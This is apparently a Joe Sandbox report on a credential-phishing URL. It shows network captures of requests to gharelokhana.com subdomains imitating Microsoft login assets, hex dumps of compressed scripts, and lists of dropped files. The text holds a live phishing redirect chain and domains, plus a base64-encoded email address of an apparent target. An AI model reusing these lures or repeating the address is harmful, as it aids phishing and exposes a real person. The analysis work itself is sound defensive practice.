2024-12-04 16:37:45 UTC	16384	IN	Data Raw: ca b6 76 8a aa 54 4c cd c9 bf bb 28 7d b6 9c a6 ab 89 d9 38 9d ae 02 a1 21 bb e2 b0 ca 73 58 86 14 98 b4 b4 51 9c 89 3c 80 47 e9 a7 b3 f7 1f bc e4 2b cb 96 e1 6f 85 c9 fb b2 e1 f9 3e c6 4e 85 1d d9 a4 cc ee 12 25 7d d9 30 36 f3 4b 78 7d c9 b3 5a 5a 33 7e 29 87 d8 00 ab 31 8b 2e 4f 13 df b5 36 ec 17 78 08 3a f6 8b 0d ab 8a f6 d3 1b 51 8b 2a 75 b1 92 ba a7 d0 38 bc b6 1a 2f 7f 7d 6c af d4 5e 6f 95 4e fb ab 76 fa 58 2a 52 9f 57 f6 4f b5 3f b4 08 5b ab ac d4 e0 07 6f cf f6 2a 9d ee fc ac ed a1 81 be e4 b8 65 35 6e 37 84 de 15 c4 6f 95 51 9e 36 4c 9e d5 b7 4a 2e 1c 05 3d 65 18 70 17 31 54 b5 5a e3 a1 c8 4a c8 ff dd 58 84 9e 33 8c 20 25 ef e7 12 5c a4 2f bd 24 89 bf 8d a6 6c 92 8d be 5d 85 19 1b f5 da ed 6d 7f 6b 6b bb d3 1e f7 c6 5b db 7e a7 df d9 1e ef f4 3a Data Ascii: vTL(}8!sXQ<G+o>N%}06Kx}ZZ3~)1.O6x:Qu8/}l^oNvXRWO?[o*e5n7oQ6LJ.=ep1TZJX3 %\/$l]mkk[~:
2024-12-04 16:37:45 UTC	199	IN	Data Raw: f8 fe 7e 6a d7 da 62 71 a6 3c 32 c4 32 ed 65 39 2c c4 ff 30 ed e5 ce 42 0b ad 06 22 55 6b 8b 7c fd ae 72 47 ee 11 17 e3 38 6b a8 9f 8d aa 5d b1 f6 6e ee 23 c3 8c 55 62 15 e5 1d ab f6 a2 32 e1 8e 61 7b 26 70 ee 36 0d 31 e8 f4 f1 2f 4a 62 ac 9d 28 63 36 e3 85 e1 c5 9f 4d 38 6b 08 e6 62 42 f9 18 22 f7 a8 88 c0 8f 60 6b 17 51 3d 8c d5 ac 42 61 43 dd d0 52 f2 1f 33 bd 7a 32 9d aa c4 f0 b9 b0 1d 4e 3b 5a 23 8c 6e 04 ab 7a c9 02 11 cb 18 46 85 1e 81 ff cf cb 97 ff ab c1 fd 94 3f 78 b3 19 86 35 fd f4 de dd d9 19 ef b6 3b 3b bb bb 7d 36 d9 e9 6f 05 3b fe a4 df ba f6 66 ff 3f 63 67 3f 3d 89 89 05 00 Data Ascii: ~jbq<22e9,0B"Uk\|rG8k]n#Ub2a{&p61/Jb(c6M8kbB"`kQ=BaCR3z2N;Z#nzF?x5;;}6o;f?cg?=

Timestamp	Bytes transferred	Direction	Data
2024-12-04 16:37:42 UTC	684	OUT	GET /ests/2.1/content/cdnbundles/ux.converged.error.strings-en.min_v1eniakvll_1x20aakd_sg2.js HTTP/1.1 Host: 4cd0d823-53cae677.gharelokhana.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Origin: https://fdgfhvcfdgfhhjh.gharelokhana.com sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: same-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: script Referer: https://fdgfhvcfdgfhhjh.gharelokhana.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-04 16:37:43 UTC	812	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 16:37:43 GMT Content-Type: application/x-javascript Content-Length: 10932 Connection: close cache-control: public, max-age=31536000 last-modified: Tue, 27 Aug 2024 00:48:37 GMT etag: 0x8DCC631FC6EAF1F x-ms-request-id: 51222851-f01e-000e-45d0-44d54b000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding access-control-allow-origin: * x-azure-ref: 20241204T163743Z-15b54885d96b2wtthC1FRAycng00000005ng00000000w34a x-fd-int-roxy-purgeid: 4554691 x-cache: TCP_HIT accept-ranges: bytes content-encoding: gzip
2024-12-04 16:37:43 UTC	10932	IN	Data Raw: 1f 8b 08 00 00 00 00 00 00 03 c5 7d db 72 e3 38 b2 e0 af 68 38 1b dd f6 36 ed d6 d5 96 59 ad e9 a5 25 d9 d6 94 2c a9 25 b9 dc 1d 35 bd 0a 5a 84 64 8e 29 52 c3 4b b9 34 9e 8a 98 f7 7d dd 97 fd bd f3 25 9b 17 80 04 75 71 b9 7a 36 62 eb c1 45 02 89 04 90 c8 4c 64 26 12 d4 9f 16 69 30 4f bc 30 38 12 c7 2f ea b9 14 1e 25 c7 2f de e2 28 f8 98 fc 7e 1c 89 24 8d 82 12 3e 9f 8a cf eb 30 4a e2 77 9f 9c a8 e4 b5 b0 a8 f5 22 cb ac 97 2f a6 e7 5a 89 e9 87 8e 2b 5c eb 4f 95 2f ef 64 53 81 4d e7 8e ef 1f 79 0a 83 e9 99 f9 73 78 0c 2f dc ac f5 a7 72 5e f1 05 bb 09 5a 2f 19 a2 f0 74 d5 12 66 78 3a 6f 05 f0 77 dd 32 0c 33 3c 2a 1f 7f 39 fa 98 4f c3 0c cd e0 f8 25 38 aa 1e d3 28 93 56 70 54 01 fc f0 5f fd d8 8c e0 bf c6 b1 e9 b4 bc d3 6e 14 85 51 47 c4 73 33 56 6f 53 2f f1 Data Ascii: }r8h86Y%,%5Zd)RK4}%uqz6bELd&i0O08/%/(~$>0Jw"/Z+\O/dSMysx/r^Z/tfx:ow23<*9O%8(VpT_nQGs3VoS/

Timestamp	Bytes transferred	Direction	Data
2024-12-04 16:37:45 UTC	565	OUT	GET /ests/2.1/content/cdnbundles/ux.converged.error.strings-en.min_v1eniakvll_1x20aakd_sg2.js HTTP/1.1 Host: 4cd0d823-53cae677.gharelokhana.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: zQt4SK="NTNjYWU2NzctOTE3My00ZWNmLWEzYTMtYWY5ZTRiYjk3MmE5OmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
2024-12-04 16:37:46 UTC	812	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 16:37:46 GMT Content-Type: application/x-javascript Content-Length: 10932 Connection: close cache-control: public, max-age=31536000 last-modified: Tue, 27 Aug 2024 00:48:37 GMT etag: 0x8DCC631FC6EAF1F x-ms-request-id: a40410f3-d01e-0054-4bdb-44b3ac000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding access-control-allow-origin: * x-azure-ref: 20241204T163746Z-16c5c9558c6924hlhC1DUSzbxw00000005ug000000004sxp x-fd-int-roxy-purgeid: 4554691 x-cache: TCP_HIT accept-ranges: bytes content-encoding: gzip
2024-12-04 16:37:46 UTC	10932	IN	Data Raw: 1f 8b 08 00 00 00 00 00 00 03 c5 7d db 72 e3 38 b2 e0 af 68 38 1b dd f6 36 ed d6 d5 96 59 ad e9 a5 25 d9 d6 94 2c a9 25 b9 dc 1d 35 bd 0a 5a 84 64 8e 29 52 c3 4b b9 34 9e 8a 98 f7 7d dd 97 fd bd f3 25 9b 17 80 04 75 71 b9 7a 36 62 eb c1 45 02 89 04 90 c8 4c 64 26 12 d4 9f 16 69 30 4f bc 30 38 12 c7 2f ea b9 14 1e 25 c7 2f de e2 28 f8 98 fc 7e 1c 89 24 8d 82 12 3e 9f 8a cf eb 30 4a e2 77 9f 9c a8 e4 b5 b0 a8 f5 22 cb ac 97 2f a6 e7 5a 89 e9 87 8e 2b 5c eb 4f 95 2f ef 64 53 81 4d e7 8e ef 1f 79 0a 83 e9 99 f9 73 78 0c 2f dc ac f5 a7 72 5e f1 05 bb 09 5a 2f 19 a2 f0 74 d5 12 66 78 3a 6f 05 f0 77 dd 32 0c 33 3c 2a 1f 7f 39 fa 98 4f c3 0c cd e0 f8 25 38 aa 1e d3 28 93 56 70 54 01 fc f0 5f fd d8 8c e0 bf c6 b1 e9 b4 bc d3 6e 14 85 51 47 c4 73 33 56 6f 53 2f f1 Data Ascii: }r8h86Y%,%5Zd)RK4}%uqz6bELd&i0O08/%/(~$>0Jw"/Z+\O/dSMysx/r^Z/tfx:ow23<*9O%8(VpT_nQGs3VoS/

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report https://google.dz/url?q=qmrbdJLi6z3yh&rct=tTPvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s%2falvoradavisual.com.br%2fyoya/fqf7/anVlcmdlbi5zY2h3YXJ6QGNhcGVsbGFzcGFjZS5jb20=%C3%A3%E2%82%AC%E2%80%9A$$$%C3%A3%E2%82%AC%E2%80%9A

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

HTML

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

Phishing

Networking

System Summary

Boot Survival

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Chrome Cache Entry: 68

Chrome Cache Entry: 69

Chrome Cache Entry: 70

Chrome Cache Entry: 71

Chrome Cache Entry: 72

Chrome Cache Entry: 73

Chrome Cache Entry: 74

Chrome Cache Entry: 75

Chrome Cache Entry: 76

Chrome Cache Entry: 77

Chrome Cache Entry: 78

Chrome Cache Entry: 79

Chrome Cache Entry: 80

Chrome Cache Entry: 81

Chrome Cache Entry: 82

Chrome Cache Entry: 83

Chrome Cache Entry: 84

Chrome Cache Entry: 85

Chrome Cache Entry: 86

Chrome Cache Entry: 87

Static File Info

Network Behavior

Suricata IDS Alerts

Windows Analysis Report
https://google.dz/url?q=qmrbdJLi6z3yh&rct=tTPvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s%2falvoradavisual.com.br%2fyoya/fqf7/anVlcmdlbi5zY2h3YXJ6QGNhcGVsbGFzcGFjZS5jb20=%C3%A3%E2%82%AC%E2%80%9A$$$%C3%A3%E2%82%AC%E2%80%9A

Timestamp	Bytes transferred	Direction	Data
2024-12-04 16:37:46 UTC	545	OUT	GET /shared/1.0/content/js/ConvergedError_Core_M3x8o7EaVDaB8GOhHsrPIA2.js HTTP/1.1 Host: 4cd0d823-53cae677.gharelokhana.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: zQt4SK="NTNjYWU2NzctOTE3My00ZWNmLWEzYTMtYWY5ZTRiYjk3MmE5OmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
2024-12-04 16:37:48 UTC	812	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 16:37:47 GMT Content-Type: application/x-javascript Content-Length: 98503 Connection: close cache-control: public, max-age=31536000 last-modified: Wed, 02 Oct 2024 20:05:25 GMT etag: 0x8DCE31D8E339582 x-ms-request-id: 6bc915b3-501e-0075-29d0-4497d7000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding access-control-allow-origin: * x-azure-ref: 20241204T163747Z-15b54885d967vv5qhC1FRAdx3800000005r000000000b5kw x-fd-int-roxy-purgeid: 4554691 x-cache: TCP_HIT accept-ranges: bytes content-encoding: gzip
2024-12-04 16:37:48 UTC	13648	IN	Data Raw: 1f 8b 08 00 00 00 00 00 00 03 e4 bd 7b 77 e3 36 b2 38 f8 ff 7e 0a 99 33 eb 90 31 ad d6 d3 0f 3a 8c af 2c ab bb 35 b1 2d 8f 65 27 99 eb f6 f8 50 24 24 33 96 49 5d 92 f2 63 24 fd 3e fb 56 15 00 12 a4 28 77 77 66 ce 9e bb 67 f3 b0 08 a0 f0 2a 14 0a 55 40 a1 f0 e1 c7 ad ff ab f2 63 65 f7 db ff a9 0c af 3b 57 d7 95 c1 c7 ca f5 e7 fe d5 69 e5 12 42 ff a8 5c 0c ae fb dd de b7 97 83 95 e2 ff d7 0f 7e 5c 19 fb 53 56 81 df 91 13 33 af 12 06 95 30 aa f8 81 1b 46 b3 30 72 12 16 57 9e e0 6f e4 3b d3 ca 38 0a 9f 2a c9 03 ab cc a2 f0 0f e6 26 71 65 ea c7 09 64 1a b1 69 f8 52 d1 a1 b8 c8 ab 5c 3a 51 f2 56 e9 5f 1a 55 28 9f 41 69 fe c4 0f 20 b7 1b ce de e0 fb 21 a9 04 61 e2 bb ac e2 04 1e 95 36 85 40 10 b3 ca 3c f0 58 54 79 79 f0 dd 87 ca b9 ef 46 61 1c 8e 93 4a c4 5c e6 Data Ascii: {w68~31:,5-e'P$$3I]c$>V(wwfgU@ce;WiB\~\SV30F0rWo;8&qediR\:QV_U(Ai !a6@<XTyyFaJ\
2024-12-04 16:37:48 UTC	16384	IN	Data Raw: 69 5c e5 28 fb 98 96 8d 6e ac 0b 1e 20 cb 9b 97 8e 99 8f 63 86 7e 8c 42 bb e0 69 d3 30 19 7f c2 2a 3f 7c ba 6f 90 4b 7f f2 5b 09 19 fd 7c 2e 1c bd f4 9d 15 5f f5 01 4b 6e 30 f1 d2 b2 6c 3c 0f ae 4c 74 f9 23 9d 39 a3 57 c3 d2 79 9f 3d ed fb cf 2f f1 ce 12 fe ff eb 87 09 ba 75 e7 1d 2e 71 50 9a 7a 9a 26 17 d3 a5 0f 2e 16 7a cc 5d 5c a7 89 18 dc ad d3 10 e0 a9 75 24 fc 85 99 8a e3 c3 12 bf 7a 72 86 e4 c8 28 f3 d5 ca 84 37 3d 18 ef 9c d3 d6 cc 3b 35 f9 71 26 98 04 59 4f 70 5b bb 43 b7 7b 7a 64 fb 7a 84 0f 0f d2 2b 25 7c 5a 1e 3b 34 35 d0 3d 36 7d 85 c7 81 78 9b 1a 1f af 4b 3f 53 4f a4 48 54 0e bd 62 a9 58 5e 14 5f 98 d3 d1 0b 21 39 fc 47 3f b4 a8 ab 74 90 1d fe ac fd 1f 6d b9 24 77 d3 8a b7 ec 8a 96 be 28 50 3f 92 cd 4f 53 ff 8b bf 0e 49 1e af 03 cc 6c e7 32 Data Ascii: i\(n c~Bi0*?\|oK[\|._Kn0l<Lt#9Wy=/u.qPz&.z]\u$zr(7=;5q&YOp[C{zdz+%\|Z;45=6}xK?SOHTbX^_!9G?tm$w(P?OSIl2
2024-12-04 16:37:48 UTC	12576	IN	Data Raw: d6 0f 17 68 77 b2 91 8b 28 94 c5 5c 44 be 6d 08 55 77 9b 1b b2 b3 b9 8a 1f 19 b8 1a ef aa fd de 94 72 5a 95 74 c9 01 ee 3d e7 9c 39 91 62 11 7f b8 ab 08 4e 79 b9 36 c1 96 8e d1 e1 df f9 a2 34 61 c7 bb d7 4b 40 4a cc f7 7d 64 0e 74 16 fe 59 78 53 23 e8 71 b2 0c e7 07 be 73 58 83 2b 79 4c cf 0e 1f a9 cb 85 5f 43 6e 98 2c fd 1a 31 06 f8 5b 4e e6 9f 9b b2 87 fc 58 bd c2 97 f6 ab c9 e4 22 9c 7f d1 2d 7c 58 97 ea 85 f2 f1 d0 5b 67 93 0b 5f b4 e9 93 4b 69 97 18 51 69 e7 ac ea 6c bd 4a c3 07 fa ea 81 54 24 cf f1 32 bd 87 90 9b f5 e4 72 eb 7f 08 bf 7a cc 93 f9 2b 77 7f 13 0d 1d 6c 38 7e 57 bc 85 57 c2 6c 42 ff ed 01 8f d9 fc e2 d2 ec 50 a8 75 d9 2e 9e f3 82 c0 7a 82 37 2f ed 8a f9 fe a2 6b b8 9f 16 ad 55 7e 00 13 a7 7d cb ec aa 29 5c 47 6d 33 64 fb c5 62 d7 f6 00 Data Ascii: hw(\DmUwrZt=9bNy64aK@J}dtYxS#qsX+yL_Cn,1[NX"-\|X[g_KiQilJT$2rz+wl8~WWlBPu.z7/kU~})\Gm3db
2024-12-04 16:37:48 UTC	16384	IN	Data Raw: 5b a3 97 a6 c6 fa 49 a8 d0 07 89 bc 7b 5d c1 98 4e bc 3d 37 d1 f0 00 f8 2b 49 0d 00 1c c0 3e b5 9b 30 21 69 13 60 42 15 03 ac e6 2c ce 62 0d 6d f2 ec 3f 9b 14 1b 8a 5d f8 dc 76 aa 61 2b a1 0f 1f 8d 85 cd 8b f3 fc 3d 45 36 57 b8 1e 9e 3b 7e 31 7c 7e da 14 82 58 0e ac b0 64 e6 9a 45 17 1a ac 04 f0 5e d4 d4 02 23 a7 1f 22 7f 03 4f f7 de 5e 3d c9 38 54 be 6e 3b a1 d1 a2 2d 85 dc 21 2a dc bc c8 b0 7d 66 8f f0 d4 ed a0 62 1a 05 c7 92 05 78 7f cd 15 89 5c 7c 94 fa 3d 5f ba cd cb 92 80 e1 05 cc b6 1a c7 28 ae 2a 6e 00 96 79 ef 26 d3 79 f5 42 2d 0b 56 5a 5e 55 9f 48 76 a7 ca 10 51 0f a8 f6 ea d9 47 e9 71 f3 f9 5c 59 5d ec ce 2b 6f 4e 75 0c 71 cb 24 b1 fb a7 36 ae 06 dd 26 c6 8e 93 c1 0f 50 4a 47 3f 73 88 e2 02 e8 41 ff 66 28 58 fd 23 6c 06 46 dd da f1 fd a6 81 4d Data Ascii: [I{]N=7+I>0!i`B,bm?]va+=E6W;~1\|~XdE^#"O^=8Tn;-!}fbx\\|=_(ny&yB-VZ^UHvQGq\Y]+oNuq$6&PJG?sAf(X#lFM
2024-12-04 16:37:48 UTC	6544	IN	Data Raw: 54 83 69 03 a6 34 0b 47 fc c0 97 80 31 f5 62 3b c9 b5 66 04 e2 15 4f a3 c1 22 54 0c 08 5d 15 0c 37 0d 0a ad 50 f3 13 bd 18 35 32 cd 8d 53 54 7b e9 2c d5 05 98 00 84 25 c0 d4 a5 d7 30 2c 27 95 e8 87 1c 2a cd c8 80 81 c4 13 96 31 62 70 8f 40 a6 c0 28 d0 d8 a5 06 c8 25 eb e7 be 9d 64 39 d8 eb 05 49 18 fc e8 04 c8 3a 05 12 b0 54 68 49 61 ee 80 e7 f6 83 ba b5 66 94 18 c0 95 47 27 5e 9f 19 e0 ea 85 23 3a 65 3e 49 24 ba cd f7 d4 59 0e ac 4d 41 db 9c 49 40 1b b4 6d a1 f5 d4 17 16 0c 5f 0b 74 d9 0f 77 dd 9c a6 29 93 01 27 d7 ce eb c2 6b e7 8c 10 05 a8 e7 1c b4 3f a6 b2 5e a4 93 14 b9 4e d0 bb db 17 86 71 69 38 f1 16 4f 9f 38 b0 0c 9b 99 24 31 bd 68 e5 95 12 41 a9 05 79 c1 24 07 8b dd f1 02 0c 4f a2 5c e2 39 05 25 02 0c b6 5e 58 39 e8 10 24 01 cb a5 10 52 7b 06 0a Data Ascii: Ti4G1b;fO"T]7P52ST{,%0,'*1bp@(%d9I:ThIafG'^#:e>I$YMAI@m_tw)'k?^Nqi8O8$1hAy$O\9%^X9$R{
2024-12-04 16:37:48 UTC	16384	IN	Data Raw: 3f f1 e3 7f e6 18 97 93 68 5f 48 e9 b2 cc 00 df a0 06 33 1f 38 d0 3d ac 25 bd 6b d4 65 af 21 b6 b8 66 14 ec 06 60 95 09 50 57 91 81 bc 90 49 5a 18 93 70 ff 65 c6 1a f1 9c 25 1a c3 56 66 ba 20 05 74 88 1a bd 48 30 b4 a1 42 41 dd bb 7d d8 e8 1b 54 e8 94 a6 19 66 b4 2b 00 06 6a 93 02 54 bc 44 49 cb 61 1e 68 ff 14 5e ed 6a 16 60 27 61 86 5f 97 01 ef 96 a8 c2 a7 8e 39 57 20 57 03 49 79 ef 50 97 37 76 4c 32 50 28 13 ca 3d f4 67 c0 4c c5 a8 da 86 17 c0 3d 15 d7 a2 77 4b e2 aa b9 8f 9b c3 d8 30 29 82 97 60 ba 81 fd cf 0b 01 22 99 7b 6b 2c 58 c9 f4 0b 8e bb 94 cd 20 a5 52 a3 41 e1 25 60 5d 68 a3 ac c6 d4 e5 60 42 82 42 46 14 ed 79 f4 b3 b8 6d 4c 60 15 65 9e 68 c7 94 a2 a0 88 24 94 49 10 1a 5a 68 c1 3c 2c f4 9e 07 5d f6 4a bd 92 29 4c 74 92 51 e0 dc 99 61 14 73 3f Data Ascii: ?h_H38=%ke!f`PWIZpe%Vf tH0BA}Tf+jTDIah^j`'a_9W WIyP7vL2P(=gL=wK0)`"{k,X RA%`]h`BBFymL`eh$IZh<,]J)LtQas?
2024-12-04 16:37:48 UTC	16384	IN	Data Raw: ca b6 76 8a aa 54 4c cd c9 bf bb 28 7d b6 9c a6 ab 89 d9 38 9d ae 02 a1 21 bb e2 b0 ca 73 58 86 14 98 b4 b4 51 9c 89 3c 80 47 e9 a7 b3 f7 1f bc e4 2b cb 96 e1 6f 85 c9 fb b2 e1 f9 3e c6 4e 85 1d d9 a4 cc ee 12 25 7d d9 30 36 f3 4b 78 7d c9 b3 5a 5a 33 7e 29 87 d8 00 ab 31 8b 2e 4f 13 df b5 36 ec 17 78 08 3a f6 8b 0d ab 8a f6 d3 1b 51 8b 2a 75 b1 92 ba a7 d0 38 bc b6 1a 2f 7f 7d 6c af d4 5e 6f 95 4e fb ab 76 fa 58 2a 52 9f 57 f6 4f b5 3f b4 08 5b ab ac d4 e0 07 6f cf f6 2a 9d ee fc ac ed a1 81 be e4 b8 65 35 6e 37 84 de 15 c4 6f 95 51 9e 36 4c 9e d5 b7 4a 2e 1c 05 3d 65 18 70 17 31 54 b5 5a e3 a1 c8 4a c8 ff dd 58 84 9e 33 8c 20 25 ef e7 12 5c a4 2f bd 24 89 bf 8d a6 6c 92 8d be 5d 85 19 1b f5 da ed 6d 7f 6b 6b bb d3 1e f7 c6 5b db 7e a7 df d9 1e ef f4 3a Data Ascii: vTL(}8!sXQ<G+o>N%}06Kx}ZZ3~)1.O6x:Qu8/}l^oNvXRWO?[o*e5n7oQ6LJ.=ep1TZJX3 %\/$l]mkk[~:
2024-12-04 16:37:48 UTC	199	IN	Data Raw: f8 fe 7e 6a d7 da 62 71 a6 3c 32 c4 32 ed 65 39 2c c4 ff 30 ed e5 ce 42 0b ad 06 22 55 6b 8b 7c fd ae 72 47 ee 11 17 e3 38 6b a8 9f 8d aa 5d b1 f6 6e ee 23 c3 8c 55 62 15 e5 1d ab f6 a2 32 e1 8e 61 7b 26 70 ee 36 0d 31 e8 f4 f1 2f 4a 62 ac 9d 28 63 36 e3 85 e1 c5 9f 4d 38 6b 08 e6 62 42 f9 18 22 f7 a8 88 c0 8f 60 6b 17 51 3d 8c d5 ac 42 61 43 dd d0 52 f2 1f 33 bd 7a 32 9d aa c4 f0 b9 b0 1d 4e 3b 5a 23 8c 6e 04 ab 7a c9 02 11 cb 18 46 85 1e 81 ff cf cb 97 ff ab c1 fd 94 3f 78 b3 19 86 35 fd f4 de dd d9 19 ef b6 3b 3b bb bb 7d 36 d9 e9 6f 05 3b fe a4 df ba f6 66 ff 3f 63 67 3f 3d 89 89 05 00 Data Ascii: ~jbq<22e9,0B"Uk\|rG8k]n#Ub2a{&p61/Jb(c6M8kbB"`kQ=BaCR3z2N;Z#nzF?x5;;}6o;f?cg?=

Timestamp	Bytes transferred	Direction	Data
2024-12-04 16:37:46 UTC	680	OUT	GET /53cae67791734ecfa3a3af9e4bb972a9/ HTTP/1.1 Host: fdgfhvcfdgfhhjh.gharelokhana.com Connection: Upgrade Pragma: no-cache Cache-Control: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Upgrade: websocket Origin: https://fdgfhvcfdgfhhjh.gharelokhana.com Sec-WebSocket-Version: 13 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: zQt4SK="NTNjYWU2NzctOTE3My00ZWNmLWEzYTMtYWY5ZTRiYjk3MmE5OmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg==" Sec-WebSocket-Key: WIoWfsoDojfcrEEEKjleXA== Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
2024-12-04 16:37:47 UTC	740	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 04 Dec 2024 16:37:47 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cache-control: private p3p: CP="DSP CUR OTPi IND OTRi ONL FIN" x-ms-request-id: b0ba47d5-cb94-4ef6-9490-013ce9787601 x-ms-ests-server: 2.1.19492.3 - SEC ProdSlices report-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://bfbeb8fd-53cae677.gharelokhana.com/api/report?catId=GW+estsfd+frc"}]} nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0} x-ms-srs: 1.P referrer-policy: strict-origin-when-cross-origin access-control-allow-origin: * access-control-allow-headers: *
2024-12-04 16:37:47 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-12-04 16:37:46 UTC	791	OUT	GET /shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico HTTP/1.1 Host: 4cd0d823-53cae677.gharelokhana.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://fdgfhvcfdgfhhjh.gharelokhana.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: zQt4SK="NTNjYWU2NzctOTE3My00ZWNmLWEzYTMtYWY5ZTRiYjk3MmE5OmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
2024-12-04 16:37:47 UTC	758	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 16:37:47 GMT Content-Type: image/x-icon Transfer-Encoding: chunked Connection: close cache-control: public, max-age=31536000 last-modified: Sun, 18 Oct 2020 03:02:03 GMT etag: 0x8D8731230C851A6 x-ms-request-id: ee9927f2-801e-0038-66d9-446796000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding access-control-allow-origin: * x-azure-ref: 20241204T163747Z-16c5c9558c6wphxjhC1DUSwtb800000004ng00000000muhf x-fd-int-roxy-purgeid: 0 x-cache: TCP_HIT accept-ranges: bytes
